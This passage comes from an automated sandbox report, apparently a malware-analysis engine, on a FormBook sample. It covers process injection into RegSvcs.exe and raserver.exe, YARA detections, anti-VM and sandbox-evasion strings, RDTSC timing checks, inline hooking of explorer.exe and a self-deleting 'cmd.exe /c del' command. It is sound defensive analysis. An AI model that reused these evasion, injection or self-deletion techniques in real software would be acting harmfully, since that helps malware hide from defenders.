  4_2_04D99A10 NtQuerySection
  4_2_04D99A00 NtProtectVirtualMemory
  4_2_04D99A20 NtResumeThread
  4_2_04D9A3B0 NtGetContextThread
  4_2_04D997A0 NtUnmapViewOfSection
  4_2_04D99770 NtSetInformationFile
  4_2_04D9A770 NtOpenThread
  4_2_04D99760 NtOpenProcess
  4_2_04D9A710 NtOpenProcessToken
  4_2_04D99B00 NtSetValueKey
  4_2_04D99730 NtQueryVirtualMemory
  4_2_00E19D60 NtCreateFile
  4_2_00E19E90 NtClose
  4_2_00E19E10 NtReadFile
  4_2_00E19F40 NtAllocateVirtualMemory
  4_2_00E19E8A NtClose

Note on the addresses: the 1_2_01699xxx sites in RegSvcs.exe and the 4_2_04D99xxx sites in raserver.exe share the same low-order offsets (01699840 and 04D99840 are both NtDelayExecution, 016999A0 and 04D999A0 both NtCreateSection, and so on), so the same block of code is mapped at different bases in the two processes. FormBook is documented to map a fresh copy of ntdll.dll and call the Nt* stubs from that copy rather than through the hooked, loaded ntdll, which is what these call sites look like. The 1_2_00419xxx and 4_2_00E19xxx sites likewise sit at identical offsets (0x19D60 and following) inside the FormBook images at 0x400000 in RegSvcs.exe and 0xE00000 in raserver.exe, the same regions the Yara rules matched above.
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_0112E266
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_01126578
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_01126569
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_0112C7A8
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_01129748
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_05004CC0
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_05007E28
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_05008E28
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_05009B80
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_0500DAE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041D160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DAD4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409E40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409E3C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041D686
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DF72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041E7CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01674120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165F900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711002
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017228EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017220A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01722B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171DBD2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168EBB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017222AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01721D55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01650D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01722D07
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166D5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017225DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171D466
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166841F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01721FF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01676E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171D616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01722EF7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E228EC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6B090
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E220A8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1D466
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6841F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11002
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6D5E0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E225DD
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82581
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E21D55
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5F900
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E22D07
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D50D20
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D74120
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E22EF7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E222AE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D76E30
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E21FF1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1DBD2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8EBB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E22B28
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1D160
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E02D90
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E09E40
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E09E3C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E02FB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1DF72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0165B150 appears 35 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04D5B150 appears 35 times
            Source: vOKMFxiCYt.exeBinary or memory string: OriginalFilename vs vOKMFxiCYt.exe
            Source: vOKMFxiCYt.exe, 00000000.00000002.240626128.0000000000622000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLqei.exe4 vs vOKMFxiCYt.exe
            Source: vOKMFxiCYt.exe, 00000000.00000002.245690399.0000000005C00000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKedermister.dllT vs vOKMFxiCYt.exe
            Source: vOKMFxiCYt.exe, 00000000.00000002.241448279.0000000000D2A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs vOKMFxiCYt.exe
            Source: vOKMFxiCYt.exeBinary or memory string: OriginalFilenameLqei.exe4 vs vOKMFxiCYt.exe
            Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: vOKMFxiCYt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/4
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vOKMFxiCYt.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:120:WilError_01
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMutant created: \Sessions\1\BaseNamedObjects\DGxsVlh
            Source: vOKMFxiCYt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: vOKMFxiCYt.exe ReversingLabs: Detection: 35%
            Source: unknown Process created: C:\Users\user\Desktop\vOKMFxiCYt.exe 'C:\Users\user\Desktop\vOKMFxiCYt.exe'
            Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: unknown Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: vOKMFxiCYt.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: vOKMFxiCYt.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: RegSvcs.pdb, source: raserver.exe, 00000004.00000002.506744729.000000000525F000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, raserver.exe, 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, raserver.exe
            Source: Binary string: RAServer.pdb source: RegSvcs.exe, 00000001.00000002.272464370.0000000001B70000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb source: raserver.exe, 00000004.00000002.506744729.000000000525F000.00000004.00000001.sdmp
            Source: Binary string: RAServer.pdbGCTL source: RegSvcs.exe, 00000001.00000002.272464370.0000000001B70000.00000040.00000001.sdmp
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe Code function: 0_2_006248FC push edx; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00417A32 push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041CEB5 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041CF6C push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041CF02 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041CF0B push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016AD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DAD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_00E17A32 push es; iretd
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_00E1CEB5 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_00E1CF6C push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_00E1CF02 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_00E1CF0B push eax; ret
            Source: initial sample Static PE information: section name: .text entropy: 7.62841280925

            Hooking and other Techniques for Hiding and Protection:

            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE5
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM_3
            Source: Yara match File source: 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: vOKMFxiCYt.exe PID: 2764, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 0000000000E098E4 second address: 0000000000E098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 0000000000E09B5E second address: 0000000000E09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00409A90 rdtsc
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe TID: 4120 Thread sleep time: -50971s >= -30000s
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe TID: 5968 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6520 Thread sleep count: 40 > 30
            Source: C:\Windows\explorer.exe TID: 6520 Thread sleep time: -80000s >= -30000s
            Source: C:\Windows\SysWOW64\raserver.exe TID: 2432 Thread sleep time: -80000s >= -30000s
            Source: C:\Windows\explorer.exe Last function: Thread delayed
            Source: C:\Windows\explorer.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: explorer.exe, 00000002.00000000.245822763.0000000001398000.00000004.00000020.sdmp Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000002.00000000.256631003.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.256227902.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmp Binary or memory string: vmware
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmp Binary or memory string: 26700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAK
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000002.00000002.516234509.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: explorer.exe, 00000002.00000002.504133649.0000000001398000.00000004.00000020.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
            Source: explorer.exe, 00000002.00000000.256227902.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000002.00000000.256227902.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000002.00000000.256227902.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\raserver.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00409A90 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0040ACD0 LdrLoadDll,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0165C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0165B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0165B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0167B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0167B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01674120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01674120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01674120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01674120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01674120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0168513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0168513A mov eax, dword ptr fs:[00000030h]
